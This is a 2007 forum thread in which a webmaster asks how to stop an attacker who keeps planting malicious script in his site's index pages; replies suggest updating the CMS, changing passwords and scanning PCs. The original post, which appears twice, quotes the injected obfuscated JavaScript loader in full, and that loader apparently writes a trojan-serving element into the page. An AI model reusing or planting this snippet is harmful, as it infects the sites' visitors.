Problem with server hacked, can anyone help?... - GoFuckYourself.com

Vippy · 07-28-2007, 04:24 AM

Hey guys

Im hoping someone can help me here with a problem i am having on a couple of my member sites being hacked.

Someone is managing to hack into my FTP server and inbedding a hidden remote file which is inserting malicious codes on my index page, that contain viruses via external url's. So anyone who reaches my index pages is hit with a trojan detection through there firewall!

The code which gets inbedded is always at the bottom of the index source code and it looks like this:

<script language="JavaScript">e = '0x00' + '5F';str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7% BE%B7%B4%B7%AC%A7%E6%B8%B7%BC%BC%BB%B2%FE%E2%E4%B7 %BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F 1%F1%A9%BB%AC%AE%B7%BD%B2%AC%F2%B7%B2%BA%B1%F1%B4% BC%F1%AB%B0%B4%EF%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF%C0 %B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%B B%E2%E4%F1%BC%B7%AA%E2";str=tmp='';for(i=0;i<str1. length;i+=3){tmp =unescape(str1.slice(i,i+3));str=str+String.fromCh arCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

When i upload my local clean copy of the index page it was over writing the infected file and he would pop up again with this code every 1 - 2 weeks.

The only further solution i have managed to find so far is to restrict FTP access from anywhere other than my local IP. Then we managed to detect this guy is in Russia and was accessing the remote file without using FTP and we banned all IP's from Russia! However i fear this is only a temporary solution as he can figure this out and spoof his IP address.

Anyone have any ideas what else i can do to keep this ass hole away??

RaiDeN · 07-28-2007, 04:46 AM

check this site

http://www.spybye.org/index.php?/categories/2-Malware

mrwilson · 07-28-2007, 04:49 AM

What type of websites is it? which cms?
It's just an exploit in a cms, make sure they are all updated?

Lycanthrope · 07-28-2007, 06:34 AM

Did you change your FTP password?????

Vlad · 07-28-2007, 06:53 AM

Quote:

Originally Posted by Lycanthrope

Did you change your FTP password?????

Lycanthrope · 07-28-2007, 06:57 AM

Quote:

Originally Posted by Vlad

hehehe, I didn't mean to come off sounding like a smart ass. It was a serious question. I want to know if his NEW password was compromised as well.

Vippy · 07-28-2007, 11:37 AM

Yep, we changed the FTP password also....

Vippy · 07-28-2007, 11:42 AM

thanks Raiden, im looking into spybye, do u use this yourself?

Regards

RawAlex · 07-28-2007, 11:52 AM

Check your office and home PCs for spyware or toolbars.

Make a list of all commercial software you have on the server, and very closely check for any known exploits. Often it is something as stupid as an old wordpress install that can get you screwed up. Make sure all of your software (including version of PHP and such) are 100% up to date.

Have your hosting company check your install of apache to make sure that it hasn't been screwed with. That has become a more and more common hack as time has gone on.

07-28-2007, 04:24 AM	#1
Vippy Registered User Join Date: Dec 2006 Posts: 5	Problem with server hacked, can anyone help?... Hey guys Im hoping someone can help me here with a problem i am having on a couple of my member sites being hacked. Someone is managing to hack into my FTP server and inbedding a hidden remote file which is inserting malicious codes on my index page, that contain viruses via external url's. So anyone who reaches my index pages is hit with a trojan detection through there firewall! The code which gets inbedded is always at the bottom of the index source code and it looks like this: <script language="JavaScript">e = '0x00' + '5F';str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7% BE%B7%B4%B7%AC%A7%E6%B8%B7%BC%BC%BB%B2%FE%E2%E4%B7 %BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F 1%F1%A9%BB%AC%AE%B7%BD%B2%AC%F2%B7%B2%BA%B1%F1%B4% BC%F1%AB%B0%B4%EF%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF%C0 %B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%B B%E2%E4%F1%BC%B7%AA%E2";str=tmp='';for(i=0;i<str1. length;i+=3){tmp =unescape(str1.slice(i,i+3));str=str+String.fromCh arCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script> When i upload my local clean copy of the index page it was over writing the infected file and he would pop up again with this code every 1 - 2 weeks. The only further solution i have managed to find so far is to restrict FTP access from anywhere other than my local IP. Then we managed to detect this guy is in Russia and was accessing the remote file without using FTP and we banned all IP's from Russia! However i fear this is only a temporary solution as he can figure this out and spoof his IP address. Anyone have any ideas what else i can do to keep this ass hole away??

07-28-2007, 06:34 AM	#4
Lycanthrope Confirmed User Industry Role: Join Date: Jan 2004 Location: Wisconsin Posts: 4,517	Did you change your FTP password????? __________________

07-28-2007, 04:46 AM	#2
RaiDeN Confirmed User Join Date: May 2001 Location: Netherlands Posts: 496	check this site http://www.spybye.org/index.php?/categories/2-Malware

07-28-2007, 04:49 AM	#3
mrwilson mrwilson 2.0 Industry Role: Join Date: Jul 2007 Location: ICQ: 465406783 Posts: 5,122	What type of websites is it? which cms? It's just an exploit in a cms, make sure they are all updated?

07-28-2007, 11:37 AM	#7
Vippy Registered User Join Date: Dec 2006 Posts: 5	Yep, we changed the FTP password also....

07-28-2007, 11:42 AM	#8
Vippy Registered User Join Date: Dec 2006 Posts: 5	thanks Raiden, im looking into spybye, do u use this yourself? Regards

07-28-2007, 11:52 AM	#9
RawAlex So Fucking Banned Join Date: Oct 2003 Location: In a house. Posts: 9,465	Check your office and home PCs for spyware or toolbars. Make a list of all commercial software you have on the server, and very closely check for any known exploits. Often it is something as stupid as an old wordpress install that can get you screwed up. Make sure all of your software (including version of PHP and such) are 100% up to date. Have your hosting company check your install of apache to make sure that it hasn't been screwed with. That has become a more and more common hack as time has gone on.